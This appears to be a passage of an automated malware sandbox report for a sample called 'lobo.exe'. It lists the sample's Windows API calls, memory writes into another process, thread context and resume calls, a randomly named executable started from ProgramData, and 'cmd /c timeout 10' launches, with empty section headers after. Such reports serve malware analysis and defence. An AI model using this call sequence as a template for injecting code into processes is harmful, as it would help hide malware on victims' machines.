WriteProcessMemory July 25, 2024, 8:49 a.m.	buffer: base_address: 0x00452000 process_identifier: 2936 process_handle: 0x0000052c	1	1
NtResumeThread July 25, 2024, 8:49 a.m.	thread_handle: 0x00000158 suspend_count: 1 process_identifier: 2936	1	0
CreateProcessInternalW July 25, 2024, 8:49 a.m.	thread_identifier: 3016 thread_handle: 0x00000530 process_identifier: 3012 current_directory: filepath: C:\ProgramData\HM3SOlbpH71yEXUIEAOeIiGX.exe track: 1 command_line: filepath_r: C:\ProgramData\HM3SOlbpH71yEXUIEAOeIiGX.exe stack_pivoted: 0 creation_flags: 0 () inherit_handles: 0 process_handle: 0x00000528	1	1
NtResumeThread July 25, 2024, 8:49 a.m.	thread_handle: 0x00000000000000c4 suspend_count: 1 process_identifier: 2468	1	0
NtResumeThread July 25, 2024, 8:49 a.m.	thread_handle: 0x0000000000000138 suspend_count: 1 process_identifier: 2468	1	0
NtResumeThread July 25, 2024, 8:49 a.m.	thread_handle: 0x000000000000017c suspend_count: 1 process_identifier: 2468	1	0
NtResumeThread July 25, 2024, 8:49 a.m.	thread_handle: 0x00000000000001e8 suspend_count: 1 process_identifier: 2468	1	0
CreateProcessInternalW July 25, 2024, 8:49 a.m.	thread_identifier: 2700 thread_handle: 0x0000000000000368 process_identifier: 2696 current_directory: C:\Users\test22\AppData\Local\Temp filepath: C:\Windows\System32\cmd.exe track: 1 command_line: "C:\Windows\System32\cmd.exe" /c timeout 10 & exit filepath_r: C:\Windows\System32\cmd.exe stack_pivoted: 0 creation_flags: 67634192 (CREATE_DEFAULT_ERROR_MODE\|CREATE_NEW_CONSOLE\|CREATE_UNICODE_ENVIRONMENT\|EXTENDED_STARTUPINFO_PRESENT) inherit_handles: 0 process_handle: 0x0000000000000370	1	1
NtResumeThread July 25, 2024, 8:49 a.m.	thread_handle: 0x0000000000000310 suspend_count: 1 process_identifier: 2468	1	0
NtGetContextThread July 25, 2024, 8:49 a.m.	thread_handle: 0x00000000000000c8	1	0
NtGetContextThread July 25, 2024, 8:49 a.m.	thread_handle: 0x00000000000000c8	1	0
NtResumeThread July 25, 2024, 8:49 a.m.	thread_handle: 0x00000000000000c8 suspend_count: 1 process_identifier: 2468	1	0
NtResumeThread July 25, 2024, 8:49 a.m.	thread_handle: 0x00000000000001e8 suspend_count: 1 process_identifier: 2468	1	0
CreateProcessInternalW July 25, 2024, 8:49 a.m.	thread_identifier: 2268 thread_handle: 0x0000000000000380 process_identifier: 2184 current_directory: C:\Users\test22\AppData\Local\Temp filepath: C:\Windows\System32\cmd.exe track: 1 command_line: "C:\Windows\System32\cmd.exe" /c timeout 10 & exit filepath_r: C:\Windows\System32\cmd.exe stack_pivoted: 0 creation_flags: 67634192 (CREATE_DEFAULT_ERROR_MODE\|CREATE_NEW_CONSOLE\|CREATE_UNICODE_ENVIRONMENT\|EXTENDED_STARTUPINFO_PRESENT) inherit_handles: 0 process_handle: 0x0000000000000394	1	1
NtResumeThread July 25, 2024, 8:49 a.m.	thread_handle: 0x0000000000000388 suspend_count: 1 process_identifier: 2468	1	0
CreateProcessInternalW July 25, 2024, 8:49 a.m.	thread_identifier: 2808 thread_handle: 0x0000000000000060 process_identifier: 2804 current_directory: C:\Users\test22\AppData\Local\Temp filepath: C:\Windows\System32\timeout.exe track: 1 command_line: timeout 10 filepath_r: C:\Windows\system32\timeout.exe stack_pivoted: 0 creation_flags: 524288 (EXTENDED_STARTUPINFO_PRESENT) inherit_handles: 1 process_handle: 0x0000000000000064	1	1
NtResumeThread July 25, 2024, 8:49 a.m.	thread_handle: 0x000000e4 suspend_count: 1 process_identifier: 3012	1	0
NtResumeThread July 25, 2024, 8:49 a.m.	thread_handle: 0x00000158 suspend_count: 1 process_identifier: 3012	1	0
NtResumeThread July 25, 2024, 8:49 a.m.	thread_handle: 0x00000198 suspend_count: 1 process_identifier: 3012	1	0
NtResumeThread July 25, 2024, 8:49 a.m.	thread_handle: 0x000001f4 suspend_count: 1 process_identifier: 3012	1	0
NtGetContextThread July 25, 2024, 8:49 a.m.	thread_handle: 0x000000ec	1	0
NtGetContextThread July 25, 2024, 8:49 a.m.	thread_handle: 0x000000ec	1	0
NtResumeThread July 25, 2024, 8:49 a.m.	thread_handle: 0x000000ec suspend_count: 1 process_identifier: 3012	1	0
CreateProcessInternalW July 25, 2024, 8:49 a.m.	thread_identifier: 2336 thread_handle: 0x0000000000000060 process_identifier: 2264 current_directory: C:\Users\test22\AppData\Local\Temp filepath: C:\Windows\System32\timeout.exe track: 1 command_line: timeout 10 filepath_r: C:\Windows\system32\timeout.exe stack_pivoted: 0 creation_flags: 524288 (EXTENDED_STARTUPINFO_PRESENT) inherit_handles: 1 process_handle: 0x0000000000000064	1	1

lobo.exe

Process Tree Toggle all

Network Toggle all

Suricata Toggle all

Suricata Alerts

Suricata TLS

Signatures Toggle All